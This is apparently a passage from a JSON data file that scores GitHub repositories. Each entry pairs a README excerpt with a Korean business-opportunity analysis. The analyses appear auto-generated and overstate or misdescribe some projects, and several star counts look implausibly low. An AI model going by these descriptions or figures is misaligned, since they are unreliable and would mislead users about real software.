Docs](https://readthedocs.org/projects/mythril-classic/badge/?version=master)](https://mythril-classic.readthedocs.io/en/develop/)\n[![CircleCI](https://dl.circleci.com/status-badge/img/gh/Consensys/mythril/tree/develop.svg?style=shield&circle-token=fd6738fd235f6c2d8e10234259090e3b05190d0e)](https://dl.circleci.com/status-badge/redirect/gh/Consensys/mythril/tree/develop)\n[![Sonarcloud - Maintainability](https://sonarcloud.io/api/project_badges/measure?project=mythril&metric=sqale_rating)](https://sonarcloud.io/dashboard?id=mythril)\n[![Pypi Installs](https://static.pepy.tech/badge/mythril)](https://pepy.tech/project/mythril)\n[![DockerHub Pulls](https://img.shields.io/docker/pulls/mythril/myth.svg)](https","composite_score":0.0462,"license_safety_tag":"safe"},{"name":"khang-nd/7.css","github_url":"https://github.com/khang-nd/7.css","stars":5,"language":"SCSS","license":"MIT","abandonment_months":2,"description":"# 7.css 저장소 분석\n\n## 왜 보물인가\n웹사이트를 예쁘게 꾸미는 기본 도구(CSS)를 간단하게 만들어서, 누구나 쉽게 사용할 수 있는 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 빌더 플랫폼에서 사용자가 디자인을 빠르게 적용할 수 있도록 내장\n- **내부 업무 도구**: 회사 내부 관리 시스템의 UI를 일관성 있게","readme_excerpt":"# 7.css\n\n[![npm](https://img.shields.io/npm/v/7.css)](http://npm.im/7.css)\n[![gzip size](https://img.shields.io/bundlephobia/minzip/7.css)](https://unpkg.com/7.css)\n\n<video src=\"https://github.com/user-attachments/assets/0da40ca4-f9b1-4082-8c1d-78c031f0530d\" width=\"524\" height=\"294\" controls></video>\n\n**7.css** is a CSS framework that takes semantic HTML and styles them to the Windows 7 design.\nIt is built on top of [XP.css](https://github.com/botoxparty/XP.css), which is an extension of [98.CSS](https://github.com/jdan/98.css).\n\nIt does not ship with any JavaScript, so it is compatible with your frontend framework of choice.\n\n## 📦 Installation / Usage\n\nDirectly via [unpkg](https://unpkg.com/):\n\n```html\n<!DOCTYPE html>\n<html>\n  <head>\n    <title>7.css example</title>\n    <meta charset=\"UTF-8\" />\n    <link rel=\"stylesheet\" href=\"https://unpkg.com/7.css\" />\n  </head>\n\n  <body>\n    <div class=\"window\" style=\"margin: 32px; width: 250px\">\n      <div class=\"title-bar\">\n        <div class=\"ti","composite_score":0.046,"license_safety_tag":"safe"},{"name":"nakabonne/tstorage","github_url":"https://github.com/nakabonne/tstorage","stars":35,"language":"Go","license":"Apache-2.0","abandonment_months":2,"description":"# tstorage 상품화 분석\n\n## 왜 보물인가\n시간 순서대로 정렬된 데이터를 매우 빠르게 저장하고 불러올 수 있는 특수 저장소로, 금융·센서·모니터링 같은 시간 기반 데이터를 다루는 모든 서비스의 핵심 엔진이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **주식 시세 및 암호화폐 거래소**: 실시간 가격 변동 데이터를 초 단위로 저장하고 차트 ","readme_excerpt":"# tstorage [![Go Reference](https://pkg.go.dev/badge/mod/github.com/nakabonne/tstorage.svg)](https://pkg.go.dev/mod/github.com/nakabonne/tstorage)\n\n`tstorage` is a lightweight local on-disk storage engine for time-series data with a straightforward API.\nEspecially ingestion is massively optimized as it provides goroutine safe capabilities of write into and read from TSDB that partitions data points by time.\n\n## Motivation\nI'm working on a couple of tools that handle a tremendous amount of time-series data, such as [Ali](https://github.com/nakabonne/ali) and [Gosivy](https://github.com/nakabonne/gosivy).\nEspecially Ali, I had been facing a problem of increasing heap consumption over time as it's a load testing tool that aims to perform real-time analysis.\nI little poked around a fast TSDB library that offers simple APIs but eventually nothing works as well as I'd like, that's why I settled on writing this package myself.\n\nTo see how much `tstorage` has helped improve Ali's performance, ","composite_score":0.0459,"license_safety_tag":"safe"},{"name":"sproket/Persism","github_url":"https://github.com/sproket/Persism","stars":13,"language":"TSQL","license":"BSD-3-Clause","abandonment_months":3,"description":"# Persism 저장소 분석\n\n## 왜 보물인가\n데이터베이스와 프로그램을 자동으로 연결해주는 기술로, 복잡한 작업을 단순하게 만들어 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 정보 관리 시스템이나 프로젝트 관리 도구처럼 데이터를 많이 다루는 웹 서비스\n2. **내부 업무 도구**: 회사의 직원 정보","readme_excerpt":"![](logo1.png) [Release notes 2.3.0](release-notes.md) -- [Getting Started Guide](https://sproket.github.io/Persism/manual2.html)\n\n[Table joins are now supported!](https://sproket.github.io/Persism/join.html)\n\n# Welcome\n\nPersism is a light weight, auto discovery, autoconfiguration, and convention\nover configuration ORM (Object Relational Mapping) library for Java 17 or later.\n\nFor Java 8 or later see the 1.x branch https://github.com/sproket/Persism/tree/persism1\n\n```xml \n<dependency>\n    <groupId>io.github.sproket</groupId>\n    <artifactId>persism</artifactId>\n    <version>2.3.0</version>\n</dependency>\n```\n```Java \nimport static net.sf.persism.Parameters.*;\nimport static net.sf.persism.SQL.*;\n\nConnection con = DriverManager.getConnection(url, username, password);\n\n// Instantiate a Persism session object with the connection\nSession session = new Session(con);\n\nList<Customer> list = session.query(Customer.class, sql(\"select * from Customers where CUST_NAME = ?\"), params(\"Fred\"));\n// or\n","composite_score":0.0457,"license_safety_tag":"safe"},{"name":"ProjectDent/ARKit-CoreLocation","github_url":"https://github.com/ProjectDent/ARKit-CoreLocation","stars":9,"language":"Swift","license":"mit","abandonment_months":2,"description":"# ProjectDent/ARKit-CoreLocation 분석\n\n## 왜 보물인가\n스마트폰 카메라로 현실 세계에 가상 물체를 겹쳐 보여주면서 동시에 GPS 위치 정보까지 활용할 수 있는 기술로, 실시간 위치 기반 증강현실 앱을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 위치 기반 증강현실 SaaS**\n- 건설 현장에서 지하 파이프라인","readme_excerpt":"![ARKit + CoreLocation](https://github.com/ProjectDent/ARKit-CoreLocation/blob/master/arkit.png)\n\n<p align=\"center\">\n    <a href=\"https://travis-ci.org/ProjectDent/ARKit-CoreLocation\">\n        <img src=\"https://travis-ci.org/ProjectDent/ARKit-CoreLocation.svg?branch=develop\" alt=\"CI Status\">\n    </a>\n    <a href=\"https://opensource.org/licenses/MIT\">\n        <img src=\"https://img.shields.io/github/license/ProjectDent/ARKit-CoreLocation.svg\"\n             alt=\"MIT License\">\n    </a>\n    <a href=\"https://cocoapods.org/pods/ARCL\">\n        <img src=\"https://img.shields.io/cocoapods/v/ARCL.svg?style=flat\"\n             alt=\"Pods Version\">\n    </a>\n    <a href=\"https://github.com/Carthage/Carthage\">\n        <img src=\"https://img.shields.io/badge/Carthage-compatible-brightgreen.svg?style=flat\"\n             alt=\"Carthage Compatible\">\n    </a>\n</p>\n\n**ARKit**: Uses camera and motion data to map out the local world as you move around.\n\n**CoreLocation**: Uses wifi and GPS data to determine your glo","composite_score":0.0457,"license_safety_tag":"safe"},{"name":"purescript/purescript","github_url":"https://github.com/purescript/purescript","stars":8,"language":"Haskell","license":"NOASSERTION","abandonment_months":2,"description":"# PureScript 저장소 분석\n\n## 왜 보물인가\n안전하고 신뢰할 수 있는 웹 프로그래밍을 위해 만든 언어로, 버그를 사전에 방지하는 능력이 뛰어나 금융·의료 같은 고위험 산업에서 수요가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **금융 SaaS**: 자동 투자 관리 플랫폼에서 거래 오류를 원천 차단하는 핵심 엔진으로 제공\n2. **의료 기록 API","readme_excerpt":"<img src=\"logo.png\" alt=\"PureScript\" width=\"392\">\n\nA small strongly typed programming language with expressive types that compiles to JavaScript, written in and inspired by Haskell.\n\n[![Hackage](https://img.shields.io/hackage/v/purescript.svg)](http://hackage.haskell.org/package/purescript) [![Build Status](https://github.com/purescript/purescript/actions/workflows/ci.yml/badge.svg?branch=master)](https://github.com/purescript/purescript/actions/workflows/ci.yml)\n\n## Language info\n\n- [PureScript home](http://purescript.org)\n- [Releases & changelog](https://github.com/purescript/purescript/releases)\n- [Contributing to PureScript](https://github.com/purescript/purescript/blob/master/CONTRIBUTING.md)\n\n## Resources\n\n- [PureScript book](https://book.purescript.org/)\n- [Documentation](https://github.com/purescript/documentation)\n- [Try PureScript](http://try.purescript.org)\n- [Pursuit Package Index](http://pursuit.purescript.org/)\n\n## Help!\n\n### Community Spaces\n\nThe following spaces are gov","composite_score":0.0456,"license_safety_tag":"unknown"},{"name":"AR-js-org/AR.js","github_url":"https://github.com/AR-js-org/AR.js","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# AR.js 저장소 분석\n\n## 왜 보물인가\n스마트폰 카메라로 현실 위에 3D 그래픽을 겹쳐 보여주는 증강현실 기술을 누구나 쉽게 만들 수 있도록 해주는 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **가구/의류 판매 SaaS**: 온라인 쇼핑몰에서 고객이 구매 전 자신의 방에서 가구가 어떻게 보일지 미리 확인하는 서비스\n2. **교육용 내부 도","readme_excerpt":"\n# AR.js - Augmented Reality on the Web\n\n\n[![CI](https://github.com/AR-js-org/AR.js/actions/workflows/CI.yml/badge.svg)](https://github.com/AR-js-org/AR.js/actions/workflows/CI.yml)\n[![code style: prettier](https://img.shields.io/badge/code_style-prettier-ff69b4.svg?style=flat-square)](https://github.com/prettier/prettier)\n[![Gitter chat](https://badges.gitter.im/AR-js/Lobby.png)](https://gitter.im/AR-js/Lobby)\n[![Twitter Follow](https://img.shields.io/twitter/follow/nicolocarp.svg?style=plastic&label=nicolocarpignoli-𝕏(Twitter)&style=plastic)](https://twitter.com/nicolocarp)\n[![Twitter Follow](https://img.shields.io/twitter/follow/jerome_etienne.svg?style=plastic&label=jeromeetienne-𝕏(Twitter)&style=plastic)](https://twitter.com/jerome_etienne)\n\nYou can now own the first commit of AR.js! 👉[OpenSea](https://opensea.io/assets/matic/0xe7ea2e2be12c257d376400cb231d8ee51e972bd6/3962549295964122998537137060348053157629730105441540397501924171148500367064/)\n\nAR.js is a lightweight library for","composite_score":0.0455,"license_safety_tag":"safe"},{"name":"khanhas/spicetify-cli","github_url":"https://github.com/khanhas/spicetify-cli","stars":13,"language":"JavaScript","license":"LGPL-2.1","abandonment_months":1,"description":"# spicetify-cli 사업화 분석\n\n## 왜 보물인가\nSpotify 음악 앱의 디자인과 기능을 자유롭게 커스터마이징할 수 있는 도구로, 음악 스트리밍 팬들이 자신의 취향에 맞게 앱을 꾸밀 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **테마 및 플러그인 마켓플레이스 SaaS**: 유료 테마, 커스텀 플러그인, 프리미엄 레이아웃을 판매하는 구","readme_excerpt":"<h3 align=\"center\"><a href=\"https://spicetify.app/\"><img src=\"https://i.imgur.com/iwcLITQ.png\" width=\"600px\"></a></h3>\n<p align=\"center\">\n  <a href=\"https://goreportcard.com/report/github.com/spicetify/cli\"><img src=\"https://goreportcard.com/badge/github.com/spicetify/cli\"></a>\n  <a href=\"https://github.com/spicetify/cli/releases/latest\"><img src=\"https://img.shields.io/github/release/spicetify/cli/all.svg?colorB=97CA00&label=latest%20version\"></a>\n  <a href=\"https://github.com/spicetify/cli/releases\"><img src=\"https://img.shields.io/github/downloads/spicetify/cli/total.svg?colorB=97CA00&label=total%20downloads\"></a>\n  <a href=\"https://discord.gg/VnevqPp2Rr\"><img src=\"https://img.shields.io/discord/842219447716151306?label=chat&logo=discord&logoColor=discord\"></a>\n</p>\n\n---\n\nCommand-line tool to customize the official Spotify client.\nSupports Windows, MacOS and Linux.\n\n<img src=\".github/assets/logo.png\" alt=\"img\" align=\"right\" width=\"560px\" height=\"400px\">\n\n### Features\n\n- Change color","composite_score":0.0454,"license_safety_tag":"restricted"},{"name":"jesse-ai/jesse","github_url":"https://github.com/jesse-ai/jesse","stars":15,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# jesse-ai/jesse 보물 분석\n\n## 왜 보물인가\nAI를 활용해 자동으로 주식이나 암호화폐를 사고팔아주는 투자 봇으로, 24시간 쉬지 않고 수익 기회를 찾을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개인 투자자들이 월 구독으로 자신의 계좌에 연결해 자동 매매 봇을 돌리는 웹 플랫폼\n2. **API 판매**: 암호화폐","readme_excerpt":"<div align=\"center\">\n<br>\n<p align=\"center\">\n<img src=\"assets/jesse-logo.png\" alt=\"Jesse\" height=\"72\" />\n</p>\n\n<p align=\"center\">\nAlgo-trading was 😵‍💫, we made it 🤩\n</p>\n</div>\n\n# Jesse\n[![PyPI](https://img.shields.io/pypi/v/jesse)](https://pypi.org/project/jesse)\n[![Downloads](https://pepy.tech/badge/jesse)](https://pepy.tech/project/jesse)\n[![Docker Pulls](https://img.shields.io/docker/pulls/salehmir/jesse)](https://hub.docker.com/r/salehmir/jesse)\n[![GitHub](https://img.shields.io/github/license/jesse-ai/jesse)](https://github.com/jesse-ai/jesse)\n[![coverage](https://codecov.io/gh/jesse-ai/jesse/graph/badge.svg)](https://codecov.io/gh/jesse-ai/jesse)\n\n---\n\nJesse is an advanced crypto trading framework that aims to **simplify** **researching** and defining **YOUR OWN trading strategies** for backtesting, optimizing, and live trading.\n\n## What is Jesse?\nWatch this video to get a quick overview of Jesse:\n\n[![Jesse Overview](https://img.youtube.com/vi/0EqN3OOqeJM/0.jpg)](https://www.you","composite_score":0.0452,"license_safety_tag":"safe"},{"name":"httpcats/http.cat","github_url":"https://github.com/httpcats/http.cat","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":2,"description":"# http.cat 저장소 분석\n\n## 왜 보물인가\n웹사이트가 오류가 났을 때 그 상황을 고양이 사진으로 설명해주는 도구로, 기술 문제를 친근하게 전달할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객에게 오류 메시지를 전달할 때 고양이 사진으로 감정을 부드럽게 전달하는 UI 구성\n- **내부 업무 도구**: 회사 시스템 오류 발","readme_excerpt":"# http.cat\n\n![HTTP Cat picture](https://http.cat/204)\n\n## About\n\nThis is the website that is hosted at [https://http.cat](https://http.cat).\n\nThe code for the older version hosted at the heroku platform is at the [http-status-cats-api](https://github.com/rogeriopvl/http-status-cats-api) repo.\n\nThis version does not need any server side code. The API behavior is provided by a Nginx server config.\n\nOn v2.0.0 the website was built with React and pre-rendered with react-snap.\n\nAs of v3.0.0 it's built with Next.js 13.\n\n## Development\n\n    npm run dev\n\nRuns the tests.\n\n    npm run build\n\nCreates a build of the project.\n\n## Adding a new image\n\nCurrently not all HTTP status codes are covered. You are welcome to create an issue or PR to cover them.\n\nWe've prepared some templates to make this process easier.\n\n- [Landscape template](https://docs.google.com/presentation/d/1sYxNNKxUbP11kyt9oPixWdFEykHDafr4jixy9uwMh9I/edit?usp=sharing)\n- [Portrait template](https://docs.google.com/presentation/d/1Ay","composite_score":0.0452,"license_safety_tag":"safe"},{"name":"cilame/v_jstools","github_url":"https://github.com/cilame/v_jstools","stars":95,"language":"JavaScript","license":"unknown","abandonment_months":1,"description":"# cilame/v_jstools 분석 리포트\n\n## 왜 보물인가\nJavaScript 개발자들이 반복적으로 작성하는 번거로운 코드를 자동으로 처리해주는 도구 모음으로, 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 개발 회사들이 자체 플랫폼에 통합하여 클라이언트에게 더 빠른 개발 속도 제공\n2. **내부","readme_excerpt":"# v_jstools \n\n```\n一个用于js页面逆向调试的工具。\n```\n\n2025/12/22: 更新\n```\n1 【启用工具包功能】 增加一个简版的 ai 助手功能。\n    有配置用于测试的两个 function call 接口，用于后续拓展\n    如有需求，我可以看情况添加或者后续再想办法把 function call 弄成可配置状态\n2 【启用工具包功能】 增加获取页面 cookie 功能（可以包含 httponly）\n3 【启用代码注入功能】 hook 工具输出内容支持 dark 模式。\n```\n\n2025/07/16: 更新了插件的 manifest V3 版本，重构了代码。旧版已留档：[manifest v2 旧版本在此下载](https://github.com/cilame/v_jstools/releases/tag/mainfest.v2)\n\n当前是 manifest V3 版本 (完整功能需要 chrome 大于105版本)\n\n- [1 下载方式](#1-下载方式)\n  * [1.1 直接 github 上下载到本地解压](#11-直接-github-上下载到本地解压)\n  * [1.2 通过 python 的 pip 命令行直接下载](#12-通过-python-的-pip-命令行直接下载)\n- [2 核心功能描述](#2-核心功能描述)\n  * [2.1 挂钩页面api](#21-挂钩页面api)\n  * [2.2 注入代码](#22-注入代码)\n  * [2.3 生成js环境代码](#23-生成js环境代码)\n  * [2.4 js分析代码工具包](#24-js分析代码工具包)\n- [3 插件交流平台](#3-插件交流平台)\n\n\n\n# 1 下载方式\n\n```\n有两种下载方式\n1 直接 github 下载\n2 通过 python 的 pip 命令行下载(无需翻墙)\n```\n\n## 1.1 直接 github 上下载到本地解压\n\n- [下载地址](https://github.com/cilame/v_jstools)\n\n![download_addr.png](./img/download_addr.png)\n\n- 下载后右键选中 “解压到当前文件夹” ，然后将该文件拖动到 chrome 插件页中。\n\n![drag_install","composite_score":0.0451,"license_safety_tag":"unknown"},{"name":"node-fetch/node-fetch","github_url":"https://github.com/node-fetch/node-fetch","stars":9,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# node-fetch 상용화 분석\n\n## 왜 보물인가\n웹 개발자들이 인터넷에서 데이터를 가져오는 작업을 쉽게 만들어주는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **날씨/뉴스 수집 SaaS**: 여러 웹사이트에서 실시간 정보를 자동으로 긁어모아 정리해주는 서비스\n2. **자동화 업무 도구**: 기업 내부에서 여러 시스템 간 데이터를 자동으로 주고","readme_excerpt":"<div align=\"center\">\n\t<img src=\"docs/media/Banner.svg\" alt=\"Node Fetch\"/>\n\t<br>\n\t<p>A light-weight module that brings <a href=\"https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API\">Fetch API</a> to Node.js.</p>\n\t<a href=\"https://github.com/node-fetch/node-fetch/actions\"><img src=\"https://github.com/node-fetch/node-fetch/workflows/CI/badge.svg?branch=master\" alt=\"Build status\"></a>\n\t<a href=\"https://coveralls.io/github/node-fetch/node-fetch\"><img src=\"https://img.shields.io/coveralls/github/node-fetch/node-fetch\" alt=\"Coverage status\"></a>\n\t<a href=\"https://packagephobia.now.sh/result?p=node-fetch\"><img src=\"https://badgen.net/packagephobia/install/node-fetch\" alt=\"Current version\"></a>\n\t<a href=\"https://www.npmjs.com/package/node-fetch\"><img src=\"https://img.shields.io/npm/v/node-fetch\" alt=\"Install size\"></a>\n\t<a href=\"https://github.com/sindresorhus/awesome-nodejs\"><img src=\"https://awesome.re/mentioned-badge.svg\" alt=\"Mentioned in Awesome Node.js\"></a>\n\t<a href=\"https://discor","composite_score":0.0451,"license_safety_tag":"safe"},{"name":"yshui/picom","github_url":"https://github.com/yshui/picom","stars":5,"language":"C","license":"NOASSERTION","abandonment_months":1,"description":"# picom 상용화 분석\n\n## 왜 보물인가\n컴퓨터 화면 표시 품질을 획기적으로 개선하는 핵심 기술로, 모든 디지털 기기의 사용자 경험을 한 단계 업그레이드할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 클라우드 데스크톱/원격작업 플랫폼**\n- TeamViewer, AnyDesk 같은 원격 작업 서비스에 통합하여 화면 전송 품질 ","readme_excerpt":"picom\n=====\n\n[![circleci](https://circleci.com/gh/yshui/picom.svg?style=shield)](https://circleci.com/gh/yshui/picom)\n[![codecov](https://codecov.io/gh/yshui/picom/branch/next/graph/badge.svg?token=NRSegi0Gze)](https://codecov.io/gh/yshui/picom)\n[![chat on discord](https://img.shields.io/discord/1106224720833159198?logo=discord)](https://discord.gg/SY5JJzPgME)\n\n__picom__ is a compositor for X, and a [fork of Compton](History.md).\n\n**This is a development branch, bugs to be expected**\n\nYou can leave your feedback or thoughts in the [discussion tab](https://github.com/yshui/picom/discussions), or chat with other users on [discord](https://discord.gg/SY5JJzPgME)!\n\n## Change Log\n\nSee [Releases](https://github.com/yshui/picom/releases)\n\n## Build\n\n### Dependencies\n\nAssuming you already have all the usual building tools installed (e.g. gcc, python, meson, ninja, etc.), you still need:\n\n* libx11\n* libx11-xcb\n* xproto\n* xcb\n* xcb-util\n* xcb-damage\n* xcb-xfixes\n* xcb-shape\n* xcb-renderutil\n* xcb","composite_score":0.0447,"license_safety_tag":"unknown"},{"name":"hshoff/vx","github_url":"https://github.com/hshoff/vx","stars":6,"language":"TypeScript","license":"mit","abandonment_months":1,"description":"# hshoff/vx 분석\n\n## 왜 보물인가\n작고 활발한 개발 커뮤니티가 만든 실용적인 도구로, MIT 라이선스로 완전히 자유롭게 활용하고 상용화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 데이터 시각화 플랫폼에 핵심 기능으로 통합\n- **내부 업무 도구**: 기업의 대시보드나 리포팅 시스템에 임베딩하여 직원 생산성 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"./assets/visx-geometry.png\" />\n</p>\n\n<p align=\"center\">\n  <a title=\"npm version\" href=\"https://www.npmjs.com/~visx\">\n    <img src=\"https://img.shields.io/npm/v/@visx/demo.svg?style=flat-square\" />\n  </a>\n  <a title=\"@visx/shape npm downloads\" href=\"https://www.npmjs.com/package/@visx/shape\">\n    <img src=\"https://img.shields.io/npm/dm/@visx/shape.svg?style=flat-square\" />\n  </a>\n</p>\n\n### visx\n\nvisx is a collection of reusable low-level visualization components. visx combines the power of d3\nto generate your visualization with the benefits of react for updating the DOM.\n\n> [!IMPORTANT]\n> **visx v4 is in alpha** with React 19 support. Install with the `@next` tag:\n>\n> ```bash\n> npm install @visx/shape@next\n> ```\n>\n> v3 remains the `latest` stable release. See the [migration guide](./MIGRATION.md) and [changelog](./CHANGELOG.md) for details.\n\n<br />\n\n<p align=\"center\">\n  <strong>\n    <a href=\"https://airbnb.io/visx\">Docs</a>\n  </strong>\n  &bull;\n  <strong>\n","composite_score":0.0445,"license_safety_tag":"safe"},{"name":"lightbend/config","github_url":"https://github.com/lightbend/config","stars":5,"language":"Java","license":"unknown","abandonment_months":1,"description":"# Lightbend Config 저장소 분석\n\n## 왜 보물인가\n복잡한 소프트웨어 설정을 간단하게 관리할 수 있는 도구로, 기업들이 시스템 운영 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 여러 고객사마다 다른 설정을 자동으로 적용해주는 클라우드 관리 플랫폼\n2. **내부 업무 도구**: 대규모 IT 시스템","readme_excerpt":"# Configuration library for JVM languages.\n\n[![Build Status](https://github.com/lightbend/config/actions/workflows/ci.yml/badge.svg)](https://github.com/lightbend/config/actions/workflows/ci.yml)\n\n## Overview\n\n - implemented in plain Java with no dependencies\n - supports files in three formats: Java properties, JSON, and a\n   human-friendly JSON superset\n - merges multiple files across all formats\n - can load from files, URLs, or classpath\n - good support for \"nesting\" (treat any subtree of the config the\n   same as the whole config)\n - users can override the config with Java system properties,\n    `java -Dmyapp.foo.bar=10`\n - supports configuring an app, with its framework and libraries,\n   all from a single file such as `application.conf`\n - parses duration and size settings, \"512k\" or \"10 seconds\"\n - converts types, so if you ask for a boolean and the value\n   is the string \"yes\", or you ask for a float and the value is\n   an int, it will figure it out.\n - JSON superset features:\n  ","composite_score":0.0445,"license_safety_tag":"unknown"},{"name":"jamesdbloom/mockserver","github_url":"https://github.com/jamesdbloom/mockserver","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# MockServer 상용화 분석\n\n## 왜 보물인가\n소프트웨어 개발 시 외부 시스템 없이도 테스트할 수 있는 가짜 서버를 만들어주는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **API 테스트 자동화 SaaS**: 기업의 개발팀이 월 구독료를 내고 자동으로 가짜 API 서버를 생성하여 품질 검증\n2. **금융사 내부","readme_excerpt":"MockServer &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [![Build status](https://badge.buildkite.com/3b6803f4fe98cb5ed7bf18292a1434f800b53d8fecb92811d8.svg?branch=master&style=square&theme=slack)](https://buildkite.com/mockserver/mockserver) \n[![GitHub license](https://img.shields.io/github/license/mock-server/mockserver-monorepo.svg)](https://github.com/mock-server/mockserver-monorepo/blob/master/LICENSE.md) \n[![GitHub stars](https://img.shields.io/github/stars/mock-server/mockserver-monorepo.svg)](https://github.com/mock-server/mockserver-monorepo/stargazers)\n=====\n\n### Quick Start\n\nRun MockServer with Docker in seconds:\n\n```bash\ndocker run -d --rm -p 1080:1080 mockserver/mockserver\n```\n\nFor more configuration options see the [Docker documentation](https://www.mock-server.com/where/docker.html).\n\n### Documentation\n\nFor usage guide please see: [www.mock-server.com](https://www.mock-server.com/)\n\n### Developer Documentation\n\nArchitecture, code structure, infrastructure,","composite_score":0.0443,"license_safety_tag":"safe"},{"name":"JustArchi/ArchiSteamFarm","github_url":"https://github.com/JustArchi/ArchiSteamFarm","stars":5,"language":"C#","license":"apache-2.0","abandonment_months":0,"description":"# ArchiSteamFarm 사업성 분석\n\n## 왜 보물인가\nSteam 게임 플랫폼에서 자동으로 보상을 수집하고 관리해주는 도구로, 게임 회사와 개인 게이머 모두에게 운영 효율성을 높여줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 게임 개발사 마케팅 플랫폼**\n- 신작 게임 출시 시 대량의 게임 열쇠를 자동으로 배포하고 수집하는 관리 시","readme_excerpt":"<div align=\"center\">\n\n![Icon](https://raw.githubusercontent.com/JustArchiNET/ArchiSteamFarm/main/resources/ASF_184x184.png)\n\n# ArchiSteamFarm\n</div>\n\n[![Build status (GitHub)](https://img.shields.io/github/actions/workflow/status/JustArchiNET/ArchiSteamFarm/ci.yml?branch=main&label=Build&logo=github&cacheSeconds=600)](https://github.com/JustArchiNET/ArchiSteamFarm/actions?query=workflow%3AASF-ci+branch%3Amain)\n[![Build status (Docker)](https://img.shields.io/github/actions/workflow/status/JustArchiNET/ArchiSteamFarm/docker-publish-main.yml?branch=main&label=Docker&logo=docker&cacheSeconds=600)](https://hub.docker.com/r/justarchi/archisteamfarm)\n[![Github last commit date](https://img.shields.io/github/last-commit/JustArchiNET/ArchiSteamFarm.svg?label=Updated&logo=github&cacheSeconds=600)](https://github.com/JustArchiNET/ArchiSteamFarm/commits)\n[![Total downloads](https://img.shields.io/github/downloads/JustArchiNET/ArchiSteamFarm/total.svg?label=Downloads&logo=github&cacheSeconds=600)]","composite_score":0.0443,"license_safety_tag":"safe"},{"name":"rafaelpimpa/buefy","github_url":"https://github.com/rafaelpimpa/buefy","stars":10,"language":"Vue","license":"mit","abandonment_months":0,"description":"# Buefy 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 예쁜 웹사이트를 만들 수 있게 도와주는 디자인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 자체 관리자 대시보드를 빠르게 구축할 때\n2. **내부 업무 도구**: 회사의 직원용 예약 시스템, 재고 관리 시스템 개발 시\n3. **API 판매**: 웹 디자","readme_excerpt":"<p align=\"center\">\n    <a href=\"https://buefy.org\">\n        <img src=\"https://raw.githubusercontent.com/buefy/buefy/master/static/img/buefy-banner.png\" />\n    </a>\n    <a href=\"https://github.com/buefy/buefy/releases\"><img src=\"https://img.shields.io/github/v/release/buefy/buefy?logo=buefy&color=7957d5&labelColor=lightgrey\" /></a>\n    <a href=\"https://www.npmjs.com/package/buefy\"><img src=\"https://img.shields.io/npm/v/buefy.svg?logo=npm\" /></a>\n    <a href=\"https://www.npmjs.com/package/buefy\"><img src=\"https://img.shields.io/npm/dt/buefy.svg\" /></a>\n    <a href=\"https://circleci.com/gh/buefy/buefy\"><img src=\"https://img.shields.io/circleci/project/github/buefy/buefy.svg?style=flat-square\" /></a>\n    <a href=\"https://codecov.io/gh/buefy/buefy\"><img src=\"https://img.shields.io/codecov/c/github/buefy/buefy.svg?style=flat-square\" /></a>\n    <a href=\"https://discord.buefy.org/\"><img src=\"https://img.shields.io/badge/chat-on%20discord-7289DA.svg?logo=discord\" /></a>\n    <a href=\"https://bue","composite_score":0.0441,"license_safety_tag":"safe"},{"name":"przemyslawzaworski/Unity3D-CG-programming","github_url":"https://github.com/przemyslawzaworski/Unity3D-CG-programming","stars":6,"language":"","license":"unknown","abandonment_months":2,"description":"# Unity3D-CG 프로그래밍 저장소 분석\n\n## 왜 보물인가\n3D 게임 개발에 필수적인 그래픽 프로그래밍 기술을 실전 코드로 제공하여, 게임 개발자들이 수개월의 학습 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발 교육 SaaS**: 초보 개발자를 위한 단계별 그래픽 프로그래밍 온라인 강좌 플랫폼\n2. **게임 스튜디오 내부","readme_excerpt":"Unity shader programming (HLSL & GLSL).\n\nOnly for educational purposes.\n\nLicense Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.\n","composite_score":0.044,"license_safety_tag":"unknown"},{"name":"Chevereto/Chevereto-Free","github_url":"https://github.com/Chevereto/Chevereto-Free","stars":6,"language":"PHP","license":"AGPL-3.0","abandonment_months":2,"description":"# Chevereto-Free 분석 보고서\n\n## 왜 보물인가\n자신의 사진과 이미지를 안전하게 보관하고 공유할 수 있는 개인용 클라우드 저장소를 직접 만들 수 있는 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 사진 공유 플랫폼을 운영하는 회사가 자체 인프라를 구축할 때 사용\n2. **내부 업무 도구**: 기업의 마케팅","readme_excerpt":"[![chevereto-ultimate-remix](https://github.com/rodber/chevereto-free/assets/20590102/d926a02c-8ea2-4331-a733-5466a26567c2)](https://chevereto.com)\n\n[![Chevereto 